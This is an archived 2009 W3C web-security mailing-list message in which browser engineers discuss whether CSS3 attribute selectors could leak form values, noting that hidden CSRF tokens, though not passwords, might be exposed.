- From: Maciej Stachowiak <mjs@apple.com>
- Date: Sat, 05 Dec 2009 18:42:01 -0800
- To: Maciej Stachowiak <mjs@apple.com>
- Cc: Collin Jackson <w3c@collinjackson.com>, Boris Zbarsky <bzbarsky@mit.edu>, Adam Barth <w3c@adambarth.com>, sird@rckc.at, public-web-security@w3.org
On Dec 5, 2009, at 6:17 PM, Maciej Stachowiak wrote: > > On Dec 5, 2009, at 12:43 PM, Collin Jackson wrote: > >> On Sat, Dec 5, 2009 at 11:05 AM, Boris Zbarsky <bzbarsky@mit.edu> >> wrote: >>> On 12/5/09 1:05 PM, Collin Jackson wrote: >>>> It seems like CSS3 is adding a lot of attack surface >>> >>> Maybe I'm missing something... what attack surface is being added >>> here, >>> exactly? Attribute selectors? >> >> Right. Attribute selectors that can read the values of input fields >> and send the result over the network. > > An attribute selector on the value attribute can't read the actual > value of an input field, only the default value. To be fair though, while this won't help you learn anything about passwords, it could tell you about a CSRF-defense secret token that's embedded in the form via <input type="hidden" value="XXXXXX">. Regards, Maciej
Received on Sunday, 6 December 2009 02:42:36 UTC